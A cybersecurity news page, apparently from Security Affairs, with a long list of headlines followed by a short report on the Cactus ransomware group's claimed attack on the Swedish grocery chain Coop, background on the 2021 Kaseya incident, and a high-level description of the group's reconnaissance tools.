Cactus RANSOMWARE gang hit the Swedish retail and grocery provider Coop

My Slice, an Italian adaptive phishing campaign
Threat actors exploit Apache ActiveMQ flaw to deliver the Godzilla Web Shell
Cybercriminals leaked massive volumes of stolen PII data from Thailand in Dark Web
Backdoored pirated applications target Apple macOS users
LockBit ransomware gang claims the attack on the sandwich chain Subway
Security Affairs newsletter Round 455 by Pierluigi Paganini INTERNATIONAL EDITION
Admin of the BreachForums hacking forum sentenced to 20 years supervised release
VF Corp December data breach impacts 35 million customers
China-linked APT UNC3886 exploits VMware zero-day since 2021
Ransomware attacks break records in 2023: the number of victims rose by 128%
US CISA warns of actively exploited Ivanti EPMM flaw CVE-2023-35082
The Quantum Computing Cryptopocalypse: I'll Know It When I See It
Kansas State University suffered a serious cybersecurity incident
CISA adds Chrome and Citrix NetScaler to its Known Exploited Vulnerabilities catalog
Google TAG warns that Russian COLDRIVER APT is using a custom backdoor
PixieFail: Nine flaws in UEFI open-source reference implementation could have severe impacts
iShutdown lightweight method allows to discover spyware infections on iPhones
Pro-Russia group hit Swiss govt sites after Zelensky visit in Davos
Github rotated credentials after the discovery of a vulnerability
FBI, CISA warn of AndroxGh0st botnet for victim identification and exploitation
Citrix warns admins to immediately patch NetScaler for actively exploited zero-days
Google fixed the first actively exploited Chrome zero-day of 2024
Atlassian fixed critical RCE in older Confluence versions
VMware fixed a critical flaw in Aria Automation. Patch it now
Experts warn of mass exploitation of Ivanti Connect Secure VPN flaws
Experts warn of a vulnerability affecting Bosch BCC100 Thermostat
Over 178,000 SonicWall next-generation firewalls (NGFW) online exposed to hack
Phemedrone info stealer campaign exploits Windows SmartScreen bypass
Balada Injector continues to infect thousands of WordPress sites
Attackers target Apache Hadoop and Flink to deliver cryptominers
Apple fixed a bug in Magic Keyboard that allows to monitor Bluetooth traffic
Security Affairs newsletter Round 454 by Pierluigi Paganini INTERNATIONAL EDITION
GitLab fixed a critical zero-click account hijacking flaw
Juniper Networks fixed a critical RCE bug in its firewalls and switches
Vast Voter Data Leaks Cast Shadow Over Indonesia's 2024 Presidential Election
Researchers created a PoC for Apache OFBiz flaw CVE-2023-51467
Team Liquid's wiki leak exposes 118K users
CISA adds Ivanti and Microsoft SharePoint bugs to its Known Exploited Vulnerabilities catalog
Two zero-day bugs in Ivanti Connect Secure actively exploited
X Account of leading cybersecurity firm Mandiant was hacked because not adequately protected
Cisco fixed critical Unity Connection vulnerability CVE-2024-20272
ShinyHunters member sentenced to three years in prison
HMG Healthcare disclosed a data breach
Threat actors hacked the X account of the Securities and Exchange Commission (SEC) and announced fake Bitcoin ETF approval
Decryptor for Tortilla variant of Babuk ransomware released
Microsoft Patch Tuesday for January 2024 fixed 2 critical flaws
CISA adds Apache Superset bug to its Known Exploited Vulnerabilities catalog
Syrian group Anonymous Arabic distributes stealthy malware Silver RAT
Swiss Air Force sensitive files stolen in the hack of Ultra Intelligence & Communications
DoJ charged 19 individuals in a transnational cybercrime investigation (xDedic Marketplace)
Long-existing Bandook RAT targets Windows machines
A cyber attack hit the Beirut International Airport
Iranian crypto exchange Bit24.cash leaks user passports and IDs
Security Affairs newsletter Round 453 by Pierluigi Paganini INTERNATIONAL EDITION
Turkish Sea Turtle APT targets Dutch IT and Telecom firms
Experts spotted a new macOS Backdoor named SpectralBlur linked to North Korea
Merck settles with insurers regarding a $1.4 billion claim over NotPetya damages
The source code of Zeppelin Ransomware sold on a hacking forum
Russia-linked APT Sandworm was inside Ukraine telecoms giant Kyivstar for months
Ivanti fixed a critical EPM flaw that can result in remote code execution
MyEstatePoint Property Search Android app leaks user passwords
Hacker hijacked Orange Spain RIPE account causing internet outage to company customers
HealthEC data breach impacted more than 4.5 Million people
Experts found 3 malicious packages hiding crypto miners in PyPi repository
Crooks hacked Mandiant X account to push cryptocurrency scam
Cybercriminals Implemented Artificial Intelligence (AI) for Invoice Fraud
CISA ADDS CHROME AND PERL LIBRARY FLAWS TO ITS KNOWN EXPLOITED VULNERABILITIES CATALOG
Don't trust links with known domains: BMW affected by redirect vulnerability
Hackers stole more than $81 million worth of crypto assets from Orbit Chain
Ukraine's SBU said that Russia's intelligence hacked surveillance cameras to direct a missile strike on Kyiv
Experts warn of JinxLoader loader used to spread Formbook and XLoader
Terrapin attack allows to downgrade SSH protocol security
Multiple organizations in Iran were breached by a mysterious hacker
Top 2023 Security Affairs cybersecurity stories
Malware exploits undocumented Google OAuth endpoint to regenerate Google cookies
Cactus RANSOMWARE gang hit the Swedish retail and grocery provider Coop
Google agreed to settle a $5 billion privacy lawsuit
Security Affairs newsletter Round 452 by Pierluigi Paganini INTERNATIONAL EDITION
INC RANSOM ransomware gang claims to have breached Xerox Corp
Spotify music converter TuneFab puts users at risk
Cyber attacks hit the Assembly of the Republic of Albania and telecom company One Albania
Russia-linked APT28 used new malware in a recent phishing campaign
Clash of Clans gamers at risk while using third-party app
New Version of Meduza Stealer Released in Dark Web
Operation Triangulation attacks relied on an undocumented hardware feature
Cybercriminals launched "Leaksmas" event in the Dark Web exposing massive volumes of leaked PII and compromised data
Lockbit ransomware attack interrupted medical emergencies gang at a German hospital network
Experts warn of critical Zero-Day in Apache OfBiz
Xamalicious Android malware distributed through the Play Store
Barracuda fixed a new ESG zero-day exploited by Chinese group UNC4841
Elections 2024, artificial intelligence could upset world balances
Experts analyzed attacks against poorly managed Linux SSH servers
A cyberattack hit Australian healthcare provider St Vincent's Health Australia
Rhysida ransomware group hacked Abdali Hospital in Jordan
Carbanak malware returned in ransomware attacks
Resecurity Released a 2024 Cyber Threat Landscape Forecast
APT group UAC-0099 targets Ukraine exploiting a WinRAR flaw
Iran-linked APT33 targets Defense Industrial Base sector with FalseFont backdoor
Security Affairs newsletter Round 451 by Pierluigi Paganini INTERNATIONAL EDITION
Europol and ENISA spotted 443 e-stores compromised with digital skimming
Video game giant Ubisoft investigates reports of a data breach
LockBit ransomware gang claims to have breached accountancy firm Xeinadin
Mobile virtual network operator Mint Mobile discloses a data breach
Akira ransomware gang claims the theft of sensitive data from Nissan Australia
Member of Lapsus$ gang sentenced to an indefinite hospital order
Real estate agency exposes details of 690k customers
ESET fixed a high-severity bug in the Secure Traffic Scanning Feature of several products
Phishing attacks use an old Microsoft Office flaw to spread Agent Tesla malware
Data leak exposes users of car-sharing service Blink Mobility
Google addressed a new actively exploited Chrome zero-day
German police seized the dark web marketplace Kingdom Market
Law enforcement Operation HAECHI IV led to the seizure of $300 Million
Sophisticated JaskaGO info stealer targets macOS and Windows
BMW dealer at risk of takeover by cybercriminals
Comcast's Xfinity customer data exposed after CitrixBleed attack
FBI claims to have dismantled AlphV/Blackcat ransomware operation, but the group denies it
Smishing Triad Cybercriminals Impersonate UAE Federal Authority for Identity and Citizenship on the Peak of Holidays Season
The ransomware attack on Westpole is disrupting digital services for Italian public administration
Info stealers and how to protect against them
Pro-Israel Predatory Sparrow hacker group disrupted services at around 70% of Iran's fuel stations
Qakbot is back and targets the Hospitality industry
A supply chain attack on crypto hardware wallet Ledger led to the theft of $600K
MongoDB investigates a cyberattack, customer data exposed
InfectedSlurs botnet targets QNAP VioStor NVR vulnerability
Security Affairs newsletter Round 450 by Pierluigi Paganini INTERNATIONAL EDITION
New NKAbuse malware abuses NKN decentralized P2P network protocol
Snatch ransomware gang claims the hack of the food giant Kraft Heinz
Multiple flaws in pfSense firewall can lead to arbitrary code execution
BianLian, White Rabbit, and Mario Ransomware Gangs Spotted in a Joint Campaign
Data of over a million users of the crypto exchange GokuMarket exposed
Idaho National Laboratory data breach impacted 45,047 individuals
Ubiquiti users claim to have access to other people's devices
Russia-linked APT29 spotted targeting JetBrains TeamCity servers
Microsoft seized the US infrastructure of the Storm-1152 cybercrime group
French authorities arrested a Russian national for his role in the Hive ransomware operation
China-linked APT Volt Typhoon linked to KV-Botnet
UK Home Office is ignoring the risk of catastrophic ransomware attacks, report warns
OAuth apps used in cryptocurrency mining, phishing campaigns, and BEC attacks
Sophos backports fix for CVE-2022-3236 for EOL firewall firmware versions due to ongoing attacks
December 2023 Microsoft Patch Tuesday fixed 4 critical flaws
Ukrainian military intelligence service hacked the Russian Federal Taxation Service
Kyivstar, Ukraine's largest mobile carrier, brought down by a cyber attack
Dubai's largest taxi app exposes 220K users
Operation Blacksmith: Lazarus exploits Log4j flaws to deploy DLang malware
Apple released iOS 17.2 to address a dozen of security flaws
Toyota Financial Services discloses a data breach
Apache fixed Critical RCE flaw CVE-2023-50164 in Struts 2
CISA adds Qlik Sense flaws to its Known Exploited Vulnerabilities catalog
CISA and ENISA signed a Working Arrangement to enhance cooperation
Researcher discovered a new lock screen bypass bug for Android 14 and 13
WordPress 6.4.2 fixed a Remote Code Execution (RCE) flaw
Security Affairs newsletter Round 449 by Pierluigi Paganini INTERNATIONAL EDITION
Hacktivists hacked an Irish water utility and interrupted the water supply
5Ghoul flaws impact hundreds of 5G devices with Qualcomm, MediaTek chips
Norton Healthcare disclosed a data breach after a ransomware attack
Bypassing major EDRs using Pool Party process injection techniques
Founder of Bitzlato exchange has pleaded for unlicensed money transmitting
Android barcode scanner app exposes user passwords
UK and US expose Russia Callisto Group's activity and sanction members
A cyber attack hit Nissan Oceania
New Krasue Linux RAT targets telecom companies in Thailand
Atlassian addressed four new RCE flaws in its products
CISA adds Qualcomm flaws to its Known Exploited Vulnerabilities catalog
Experts demonstrate a post-exploitation tampering technique to display Fake Lockdown mode
GST Invoice Billing Inventory exposes sensitive data to threat actors
Threat actors breached US govt systems by exploiting Adobe ColdFusion flaw
ENISA published the ENISA Threat Landscape for DoS Attacks Report
Russia-linked APT28 group spotted exploiting Outlook flaw to hijack MS Exchange accounts
Google fixed critical zero-click RCE in Android
New P2PInfect bot targets routers and IoT devices
Malvertising attacks rely on DanaBot Trojan to spread CACTUS Ransomware
LockBit on a Roll: ICBC Ransomware Attack Strikes at the Heart of the Global Financial Order
Zyxel fixed tens of flaws in Firewalls, Access Points and NAS devices
New Agent Raccoon malware targets the Middle East, Africa and the US
Security Affairs newsletter Round 448 by Pierluigi Paganini INTERNATIONAL EDITION
Researchers devised an attack technique to extract ChatGPT training data
Fortune-telling website WeMystic exposes 13M user records
Expert warns of Turtle macOS ransomware
Black Basta Ransomware gang accumulated at least $107 million in Bitcoin ransom payments since early 2022
CISA adds ownCloud and Google Chrome bugs to its Known Exploited Vulnerabilities catalog
Apple addressed 2 new iOS zero-day vulnerabilities
Critical Zoom Room bug allowed to gain access to Zoom Tenants
Rhysida ransomware group hacked King Edward VII's Hospital in London
Google addressed the sixth Chrome Zero-Day vulnerability in 2023
Okta reveals additional attackers' activities in October 2023 Breach
Thousands of secrets lurk in app images on Docker Hub
Threat actors started exploiting critical ownCloud flaw CVE-2023-49103
International police operation dismantled a prominent Ukraine-based Ransomware group
Daixin Team group claimed the hack of North Texas Municipal Water District
Healthcare provider Ardent Health Services disclosed a ransomware attack
Ukraine's intelligence service hacked Russia's Federal Air Transport Agency, Rosaviatsia
Iranian hacker group Cyber Av3ngers hacked the Municipal Water Authority of Aliquippa in Pennsylvania
The hack of MSP provider CTS potentially impacted hundreds of UK law firms
Security Affairs newsletter Round 447 by Pierluigi Paganini INTERNATIONAL EDITION
Rhysida ransomware gang claimed China Energy hack
North Korea-linked APT Lazarus is using a MagicLine4NX zero-day flaw in supply chain attack
Hamas-linked APT uses Rust-based SysJoker backdoor against Israel
App used by hundreds of schools leaking children's data
Microsoft launched its new Microsoft Defender Bounty Program
Exposed Kubernetes configuration secrets can fuel supply chain attacks
North Korea-linked Konni APT uses Russian-language weaponized documents
ClearFake campaign spreads macOS AMOS information stealer
Welltok data breach impacted 8.5 million patients in the US
North Korea-linked APT Diamond Sleet supply chain attack relies on CyberLink software
Automotive parts giant AutoZone disclosed data breach after MOVEit hack
New InfectedSlurs Mirai-based botnet exploits two zero-days
SiegedSec hacktivist group hacked Idaho National Laboratory (INL)
CISA adds Looney Tunables Linux bug to its Known Exploited Vulnerabilities catalog
Citrix provides additional measures to address Citrix Bleed
Tor Project removed several relays associated with a suspicious cryptocurrency scheme
Experts warn of a surge in NetSupport RAT attacks against education and government sectors
The Top 5 Reasons to Use an API Management Platform
Canadian government impacted by data breaches of two of its contractors
Rhysida ransomware gang is auctioning data stolen from the British Library
Russia-linked APT29 group exploited WinRAR 0day in attacks against embassies
DarkCasino joins the list of APT groups exploiting WinRAR zero-day
US teenager pleads guilty to his role in credential stuffing attack on a betting site
Security Affairs newsletter Round 446 by Pierluigi Paganini INTERNATIONAL EDITION
8Base ransomware operators use a new variant of the Phobos ransomware
Russian APT Gamaredon uses USB worm LitterDrifter against Ukraine
The board of directors of OpenAI fired Sam Altman
Medusa ransomware gang claims the hack of Toyota Financial Services
CISA adds Sophos Web Appliance bug to its Known Exploited Vulnerabilities catalog
Zimbra zero-day exploited to steal government emails by four groups
Vietnam Post exposes 1.2TB of data including email addresses
Samsung suffered a new data breach
FBI and CISA warn of attacks by Rhysida ransomware gang
Critical flaw fixed in SAP Business One product
Law enforcement agencies dismantled the illegal botnet proxy service IPStorm
Gamblers' data compromised after casino giant Strendus fails to set password
VMware disclosed a critical and unpatched authentication bypass flaw in VMware Cloud Director Appliance
Danish critical infrastructure hit by the largest cyber attack in Denmark's history
Major Australian ports blocked after a cyber attack on DP World
Nuclear and Oil & Gas are Major Targets of Ransomware Groups in 2024
CISA adds five vulnerabilities in Juniper devices to its Known Exploited Vulnerabilities catalog
LockBit ransomware gang leaked data stolen from Boeing
North Korea-linked APT Sapphire Sleet targets IT job seekers with bogus skills assessment portals
The Lorenz ransomware group hit Texas-based Cogdell Memorial Hospital
The State of Maine disclosed a data breach that impacted 1.3M people
Security Affairs newsletter Round 445 by Pierluigi Paganini INTERNATIONAL EDITION
Police seized BulletProftLink phishing-as-a-service (PhaaS) platform
Serbian pleads guilty to running Monopoly dark web drug market
McLaren Health Care revealed that a data breach impacted 2.2 million people
After ChatGPT, Anonymous Sudan took down the Cloudflare website
Industrial and Commercial Bank of China (ICBC) suffered a ransomware attack
SysAid zero-day exploited by Clop ransomware group
Dolly.com pays ransom, attackers release data anyway
DDoS attack leads to significant disruption in ChatGPT services
Russian Sandworm disrupts power in Ukraine with a new OT attack
Veeam fixed multiple flaws in Veeam ONE, including critical issues
Pro-Palestinian hackers group Soldiers of Solomon disrupted the production cycle of the biggest flour production plant in Israel
Iranian Agonizing Serpens APT is targeting Israeli entities with destructive cyber attacks
Critical Confluence flaw exploited in ransomware attacks
QNAP fixed two critical vulnerabilities in QTS OS and apps
Attackers use Google Calendar RAT to abuse Calendar service as C2 infrastructure
Socks5Systemz proxy service delivered via PrivateLoader and Amadey
US govt sanctioned a Russian woman for laundering virtual currency on behalf of threat actors
Security Affairs newsletter Round 444 by Pierluigi Paganini INTERNATIONAL EDITION
Lazarus targets blockchain engineers with new KandyKorn macOS Malware
Kinsing threat actors probed the Looney Tunables flaws in recent attacks
ZDI discloses four zero-day flaws in Microsoft Exchange
Okta customer support system breach impacted 134 customers
Multiple WhatsApp mods spotted containing the CanesSpy Spyware
Russian FSB arrested Russian hackers who supported Ukrainian cyber operations
MuddyWater has been spotted targeting two Israeli entities
Clop group obtained access to the email addresses of about 632,000 US federal employees
Okta discloses a new data breach after a third-party vendor was hacked
Suspected exploitation of Apache ActiveMQ flaw CVE-2023-46604 to install HelloKitty ransomware
Boeing confirmed its services division suffered a cyberattack
Resecurity: Insecurity of 3rd-parties leads to Aadhaar data leaks in India
Who is behind the Mozi Botnet kill switch?
CISA adds two F5 BIG-IP flaws to its Known Exploited Vulnerabilities catalog
Threat actors actively exploit F5 BIG-IP flaws CVE-2023-46747 and CVE-2023-46748
Pro-Hamas hacktivist group targets Israel with BiBi-Linux wiper
British Library suffers major outage due to cyberattack
Critical Atlassian Confluence flaw can lead to significant data loss
WiHD leak exposes details of all torrent users
Experts released PoC exploit code for Cisco IOS XE flaw CVE-2023-20198
Canada bans WeChat and Kaspersky apps on government-issued mobile devices
Florida man sentenced to prison for SIM Swapping conspiracy that led to theft of $1M in cryptocurrency
WikiSlack attack allows redirecting business professionals to malicious websites
HackerOne awarded over $300 million to bug hunters
StripedFly, a complex malware that infected one million devices without being noticed
IT Army of Ukraine disrupted internet providers in territories occupied by Russia
Security Affairs newsletter Round 443 by Pierluigi Paganini INTERNATIONAL EDITION
Bug hunters earned $1,038,250 for 58 unique 0-days at Pwn2Own Toronto 2023
Lockbit ransomware gang claims to have stolen data from Boeing
How to Collect Market Intelligence with Residential Proxies
F5 urges to address a critical flaw in BIG-IP
Hello Alfred app exposes user data
iLeakage attack exploits Safari to steal data from Apple devices
Cloudflare mitigated 89 hyper-volumetric HTTP distributed DDoS attacks exceeding 100 million rps
Seiko confirmed a data breach after BlackCat attack
Winter Vivern APT exploited zero-day in Roundcube webmail software in recent attacks
Pwn2Own Toronto 2023 Day 1: organizers awarded $438,750 in prizes
VMware addressed critical vCenter flaw also for End-of-Life products
Citrix warns admins to patch NetScaler CVE-2023-4966 bug immediately
New England Biolabs leak sensitive data
Former NSA employee pleads guilty to attempted selling classified documents to Russia
Experts released PoC exploit code for VMware Aria Operations for Logs flaw. Patch it now!
How did the Okta Support breach impact 1Password?
PII Belonging to Indian Citizens, Including their Aadhaar IDs, Offered for Sale on the Dark Web
Spain police dismantled a cybercriminal group who stole the data of 4 million individuals
CISA adds second Cisco IOS XE flaw to its Known Exploited Vulnerabilities catalog
Cisco warns of a second IOS XE zero-day used to infect devices worldwide
City of Philadelphia suffers a data breach
SolarWinds fixed three critical RCE flaws in its Access Rights Manager product
Don't use AI-based apps, Philippine defense ordered its personnel
Vietnamese threat actors linked to DarkGate malware campaign
MI5 chief warns of Chinese cyber espionage reached an unprecedented scale
The attack on the International Criminal Court was targeted and sophisticated
Security Affairs newsletter Round 442 by Pierluigi Paganini INTERNATIONAL EDITION
A threat actor is selling access to Facebook and Instagram's Police Portal
Threat actors breached Okta support system and stole customers' data
US DoJ seized domains used by North Korean IT workers to defraud businesses worldwide
Alleged developer of the Ragnar Locker ransomware was arrested
CISA adds Cisco IOS XE flaw to its Known Exploited Vulnerabilities catalog
Tens of thousands Cisco IOS XE devices were hacked by exploiting CVE-2023-20198
Law enforcement operation seized Ragnar Locker group's infrastructure
THE 11TH EDITION OF THE ENISA THREAT LANDSCAPE REPORT IS OUT
North Korea-linked APT groups actively exploit JetBrains TeamCity flaw
Multiple APT groups exploited WinRAR flaw CVE-2023-38831
Californian IT company DNA Micro leaks private mobile phone data
Threat actors have been exploiting CVE-2023-4966 in Citrix NetScaler ADC/Gateway devices since August
A flaw in Synology DiskStation Manager allows admin account takeover
D-Link confirms data breach, but downplayed the impact
CVE-2023-20198 zero-day widely exploited to install implants on Cisco IOS XE systems
Russia-linked Sandworm APT compromised 11 Ukrainian telecommunications providers
Ransomware realities in 2023: one employee mistake can cost a company millions
Malware-laced RedAlert Rocket Alerts app targets Israeli users
Cisco warns of active exploitation of IOS XE zero-day
Signal denies claims of an alleged zero-day flaw in its platform
Microsoft Defender thwarted Akira ransomware attack on an industrial engineering firm
DarkGate malware campaign abuses Skype and Teams
The Alphv ransomware gang stole 5TB of data from the Morrison Community Hospital
Security Affairs newsletter Round 441 by Pierluigi Paganini INTERNATIONAL EDITION
Lockbit ransomware gang demanded an $80 million ransom to CDW
CISA warns of vulnerabilities and misconfigurations exploited in ransomware attacks
Stayin' Alive campaign targets high-profile Asian government and telecom entities. Is it linked to ToddyCat APT?
FBI and CISA published a new advisory on AvosLocker ransomware
More than 17,000 WordPress websites infected with the Balada Injector in September
Ransomlooker, a new tool to track and analyze ransomware groups' activities
Phishing, the campaigns that are targeting Italy
A new Magecart campaign hides the malicious code in 404 error page
CISA adds Adobe Acrobat Reader flaw to its Known Exploited Vulnerabilities catalog
Mirai-based DDoS botnet IZ1H9 added 13 payloads to target routers
Air Europa data breach exposed customers' credit cards
OpIsrael, FreePalestine, OpSaudiArabia: How Cyber Actors Capitalize On War Actions Via PsyOps
Microsoft Patch Tuesday updates for October 2023 fixed three actively exploited zero-day flaws
New HTTP/2 Rapid Reset technique behind record-breaking DDoS attacks
Exposed security cameras in Israel and Palestine pose significant risks
A flaw in libcue library impacts GNOME Linux systems
Hacktivists in Palestine and Israel after SCADA and other industrial control systems
Large-scale Citrix NetScaler Gateway credential harvesting campaign exploits CVE-2023-3519
The source code of the 2020 variant of HelloKitty ransomware was leaked on a cybercrime forum
Gaza-linked hackers and Pro-Russia groups are targeting Israel
Flagstar Bank suffered a data breach once again
Android devices shipped with backdoored firmware as part of the BADBOX network
Security Affairs newsletter Round 440 by Pierluigi Paganini International edition
North Korea-linked Lazarus APT laundered over $900 million through cross-chain crime
QakBot threat actors are still operational after the August takedown
Ransomware attack on MGM Resorts costs $110 Million
Cybersecurity, why a hotline number could be important
Multiple experts released exploits for Linux local privilege escalation flaw Looney Tunables
Cisco Emergency Responder is affected by a critical Static Credentials bug. Fix it immediately!
Belgian intelligence service VSSE accused Alibaba of possible espionage at European hub in Liege
CISA adds JetBrains TeamCity and Windows flaws to its Known Exploited Vulnerabilities catalog
NATO is investigating a new cyber attack claimed by the SiegedSec group
Global CRM Provider Exposed Millions of Clients' Files Online
Sony sent data breach notifications to about 6,800 individuals
Apple fixed the 17th zero-day flaw exploited in attacks
Atlassian Confluence zero-day CVE-2023-22515 actively exploited in attacks
A cyberattack disrupted Lyca Mobile services
Chipmaker Qualcomm warns of three actively exploited zero-days
DRM Report Q2 2023: Ransomware threat landscape
Phishing campaign targeted US executives exploiting a flaw in Indeed job search platform
San Francisco's transport agency exposes drivers' parking permits and addresses
BunnyLoader, a new Malware-as-a-Service advertised in cybercrime forums
Exclusive: Lighting the Exfiltration Infrastructure of a LockBit Affiliate (and more)
Two hacker groups are back in the news, LockBit 3.0 Black and BlackCat/AlphV
European Telecommunications Standards Institute (ETSI) suffered a data breach
WS_FTP flaw CVE-2023-40044 actively exploited in the wild
National Logistics Portal (NLP) data leak: seaports in India were left vulnerable to takeover by hackers
North Korea-linked Lazarus targeted a Spanish aerospace company
Ransomware attack on Johnson Controls may have exposed sensitive DHS data
BlackCat gang claims they stole data of 2.5 million patients of McLaren Health Care
Security Affairs newsletter Round 439 by Pierluigi Paganini International edition
ALPHV/BlackCat ransomware gang hacked the hotel chain Motel One
FBI warns of dual ransomware attacks
Progress Software fixed two critical severity flaws in WS_FTP Server
Child abuse site taken down, organized child exploitation crime suspected: exclusive
A still unpatched zero-day RCE impacts more than 3.5M Exim servers
Chinese threat actors stole around 60,000 emails from US State Department in Microsoft breach
Misconfigured WBSC server leaks thousands of passports
CISA adds JBoss RichFaces Framework flaw to its Known Exploited Vulnerabilities catalog
Cisco urges to patch actively exploited IOS zero-day CVE-2023-20109
Dark Angels Team ransomware group hit Johnson Controls
GOOGLE FIXED THE FIFTH CHROME ZERO-DAY OF 2023
Russian zero-day broker is willing to pay $20M for zero-day exploits for iPhones and Android devices
China-linked APT BlackTech was spotted hiding in Cisco router firmware
Watch out! CVE-2023-5129 in libwebp library affects millions applications
DarkBeam leaks billions of email and password combinations
Ransomed.vc in the Spotlight: What is Known About the Ransomware Group Targeting Sony and NTT Docomo
Top 5 Problems Solved by Data Lineage
Threat actors claim the hack of Sony, and the company investigates
Canadian Flair Airlines left user data leaking for months
The Rhysida ransomware group hit the Kuwait Ministry of Finance
BORN Ontario data breach impacted 3.4 million newborns and pregnancy care patients
Xenomorph malware is back after months of hiatus and expands the list of targets
Smishing Triad Stretches Its Tentacles into the United Arab Emirates
Crooks stole $200 million worth of assets from Mixin Network
A phishing campaign targets Ukrainian military entities with drone manual lures
Alert! Patch your TeamCity instance to avoid server hack
Is Gelsemium APT behind a targeted attack in Southeast Asian Government?
Nigerian National pleads guilty to participating in a millionaire BEC scheme
New variant of BBTok Trojan targets users of 40 banks in LATAM
Deadglyph, a very sophisticated and unknown backdoor targets the Middle East
Alphv group claims the hack of Clarion, a global manufacturer of audio and video equipment for cars
Security Affairs newsletter Round 438 by Pierluigi Paganini International edition
National Student Clearinghouse data breach impacted approximately 900 US schools
Government of Bermuda blames Russian threat actors for the cyber attack
Recently patched Apple and Chrome zero-days exploited to infect devices in Egypt with Predator spyware
CISA adds Trend Micro Apex One and Worry-Free Business Security flaw to its Known Exploited Vulnerabilities catalog
Information of Air Canada employees exposed in recent cyberattack
Sandman APT targets telcos with LuaDream backdoor
Apple rolled out emergency updates to address 3 new actively exploited zero-day flaws
Ukrainian hackers are behind the Free Download Manager supply chain attack
Space and defense tech maker Exail Technologies exposes database access
Pro-Russia hacker group NoName launched a DDoS attack on Canadian airports causing severe disruptions
Experts found critical flaws in Nagios XI network monitoring software
The dark web drug marketplace PIILOPUOTI was dismantled by Finnish Customs
International Criminal Court hit with a cyber attack
GitLab addressed critical vulnerability CVE-2023-5009
Trend Micro addresses actively exploited zero-day in Apex One and other security Products
ShroudedSnooper threat actors target telecom companies in the Middle East
Recent cyber attack is causing Clorox products shortage
Earth Lusca expands its arsenal with SprySOCKS Linux malware
Microsoft AI research division accidentally exposed 38TB of sensitive data
German intelligence warns cyberattacks could target liquefied natural gas (LNG) terminals
Deepfake and smishing. How hackers compromised the accounts of 27 Retool customers in the crypto industry
FBI hacker USDoD leaks highly sensitive TransUnion data
North Korea's Lazarus APT stole almost $240 million in crypto assets since June
Clop gang stolen data from major North Carolina hospitals
CardX released a data leak notification impacting their customers in Thailand
Security Affairs newsletter Round 437 by Pierluigi Paganini International edition
TikTok fined €345M by Irish DPC for violating children's privacy
Dariy Pankov, the NLBrute malware author, pleads guilty
Dangerous permissions detected in top Android health apps
Caesars Entertainment paid a ransom to avoid stolen data leaks
Free Download Manager backdoored to serve Linux malware for more than 3 years
Lockbit ransomware gang hit the Carthage Area Hospital and the Clayton-Hepburn Medical Center in New York
The iPhone of a Russian journalist was infected with the Pegasus spyware
Kubernetes flaws could lead to remote code execution on Windows endpoints
Threat actor leaks sensitive data belonging to Airbus
A new ransomware family called 3AM appears in the threat landscape
Redfly group infiltrated an Asian national grid as long as six months
Mozilla fixed a critical zero-day in Firefox and Thunderbird
Microsoft September 2023 Patch Tuesday fixed 2 actively exploited zero-day flaws
Save the Children confirms it was hit by cyber attack
Adobe fixed actively exploited zero-day in Acrobat and Reader
A new Repojacking attack exposed over 4,000 GitHub repositories to hack
MGM Resorts hit by a cyber attack
Anonymous Sudan launched a DDoS attack against Telegram
Iranian Charming Kitten APT targets various entities in Brazil, Israel, and the UAE using a new backdoor
GOOGLE FIXED THE FOURTH CHROME ZERO-DAY OF 2023
CISA adds recently discovered Apple zero-days to Known Exploited Vulnerabilities Catalog
UK and US sanctioned 11 members of the Russia-based TrickBot gang
New HijackLoader malware is rapidly growing in popularity in the cybercrime community
Some of TOP universities wouldn't pass cybersecurity exam: left websites vulnerable
Evil Telegram campaign: Trojanized Telegram apps found on Google Play
Rhysida Ransomware gang claims to have hacked three more US hospitals
Akamai prevented the largest DDoS attack on a US financial company
Security Affairs newsletter Round 436 by Pierluigi Paganini International edition
US CISA added critical Apache RocketMQ flaw to its Known Exploited Vulnerabilities catalog
Ragnar Locker gang leaks data stolen from the Israel's Mayanei Hayeshua hospital
North Korea-linked threat actors target cybersecurity experts with a zero-day
Zero-day in Cisco ASA and FTD is actively exploited in ransomware attacks
Zero-days fixed by Apple were used to deliver NSO Group's Pegasus spyware
Apple discloses 2 new actively exploited zero-day flaws in iPhones, Macs
A malvertising campaign is delivering a new version of the macOS Atomic Stealer
Two flaws in Apache SuperSet allow to remotely hack servers
Chinese cyberspies obtained Microsoft signing key from Windows crash dump due to a mistake
Google addressed an actively exploited zero-day in Android
A zero-day in Atlas VPN Linux Client leaks users' IP address
MITRE and CISA release Caldera for OT attack emulation
ASUS routers are affected by three critical remote code execution flaws
Hackers stole $41M worth of crypto assets from crypto gambling firm Stake
Freecycle data breach impacted 7 Million users
Meta disrupted two influence campaigns from China and Russia
A massive DDoS attack took down the site of the German financial agency BaFin
Smishing Triad Targeted USPS and US Citizens for Data Theft
University of Sydney suffered a security breach caused by a third-party service provider
Cybercrime will cost Germany $224 billion in 2023
PoC exploit code released for CVE-2023-34039 bug in VMware Aria Operations for Networks
Security Affairs newsletter Round 435 by Pierluigi Paganini International edition
LockBit ransomware gang hit the Commission des services electriques de Montréal (CSEM)
UNRAVELING EternalBlue: inside the WannaCry's enabler
Researchers released a free decryptor for the Key Group ransomware
Fashion retailer Forever 21 data breach impacted 500,000 individuals
Russia-linked hackers target Ukrainian military with Infamous Chisel Android malware
Akira Ransomware gang targets Cisco ASA
Coop is one of the largest retail and grocery providers in Sweden, with approximately 800 stores across the country. The stores are co-owned by 3.5 million members in 29 consumer associations. All surplus created in the business goes back to the members or is reinvested in the business, which creates a circular cycle.

The Cactus ransomware group claims to have hacked Coop and is threatening to disclose a huge amount of personal information (over 21 thousand directories).

The Cactus ransomware group added Coop to the list of victims on its Tor leak site.

Threat actors have published ID cards as proof of the hack.

In July 2021, the Swedish supermarket chain Coop was the first company to disclose the impact of the supply chain ransomware attack that hit Kaseya.

The supermarket chain Coop shut down approximately 500 stores as a result of the supply chain ransomware attack that hit the provider Kaseya.

Coop doesn't use Kaseya software itself; it was impacted by the incident because one of its software providers does.

According to BleepingComputer, the impacted provider was the Swedish MSP Visma, which manages the payment systems for the supermarket chain.

Visma confirmed it was affected by the Kaseya cyber attack that allowed the REvil ransomware to encrypt its customers' systems.

The Cactus ransomware operation has been active since March 2023. Although the threat actors use a double-extortion model, their data leak site has yet to be discovered.

Kroll researchers reported that the ransomware strain stands out for its use of encryption to protect the ransomware binary.

Cactus ransomware uses the SoftPerfect Network Scanner (netscan) to look for other targets on the network, along with PowerShell commands to enumerate endpoints. The ransomware identifies user accounts by viewing successful logins in Windows Event Viewer; it also uses a modified variant of the open-source PSnmap tool.

